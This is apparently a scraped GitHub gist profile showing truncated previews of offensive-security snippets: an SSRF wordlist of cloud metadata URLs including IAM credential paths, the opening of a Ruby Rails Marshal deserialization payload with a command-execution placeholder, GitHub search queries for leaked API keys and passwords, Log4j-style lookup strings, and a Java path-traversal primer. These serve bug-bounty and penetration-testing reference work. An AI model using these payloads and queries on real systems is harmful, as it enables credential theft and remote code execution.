Skip to content

Instantly share code, notes, and snippets.

View ehsandeep's full-sized avatar
🏠
Working from home

Sandeep Singh ehsandeep

🏠
Working from home
View GitHub Profile
@ehsandeep
ehsandeep / cloud_metadata.txt
Created July 8, 2017 00:22 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
"\x04\x08" +
"o" +
@ehsandeep
ehsandeep / auto_git_query
Created August 28, 2019 21:01 — forked from nullenc0de/auto_git_query
Automated Github Queries (Can open 29 tabs at a time)
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI
id: detect-all-takeovers
info:
name: Subdomain takeover finder
author: melbadry9
severity: high
# update this list with new takeovers matchers
# do not delete other template files for takeover
@ehsandeep
ehsandeep / exploit_path_traversals_in_Java_webapps.txt
Created April 27, 2020 11:11 — forked from harisec/exploit_path_traversals_in_Java_webapps.txt
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
so, you can read WEB-INF/web.xml. how can you escalate this issue?
[step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml.
use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan):
https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt
with time you can build your own wordlist adding files you've discovered over time.
use Burp Intruder for this, it's perfect for this job.
sort Intruder results by status code so you can see instantly which files were found.
1
gist-testing22gist-testing22gist-testing22gist-testing22
gist-testing22
${ctx:loginId}
${map:type}
${filename}
${date:MM-dd-yyyy}
${docker:containerId}
${docker:containerName}
${docker:imageName}
${env:USER}
${event:Marker}
${mdc:UserId}
  graph TD;
      Nuclei-Templates--> Customization;
      Nuclei-Templates--> Automation;
      Nuclei-Templates--> Collaboration;
      Customization--> id1(No code, Simple as Editing a text file);
      Automation--> Scan;
      Automation--> Triage;
      Automation--> Retest;
 Automation--> Regression;
@ehsandeep
ehsandeep / KEV-TO-TEMPLATE Mapping.md
Last active June 10, 2022 11:45
CVEs from Known Exploited Vulnerabilities Catalog list that can be scanned using nuclei template, updated till https://twitter.com/USCERT_gov/status/1534557036058378241
  • CVE-2022-30525
  • CVE-2022-29464
  • CVE-2022-26134
  • CVE-2022-23134
  • CVE-2022-23131
  • CVE-2022-22965
  • CVE-2022-22954
  • CVE-2022-22947
  • CVE-2022-1040
  • CVE-2022-0543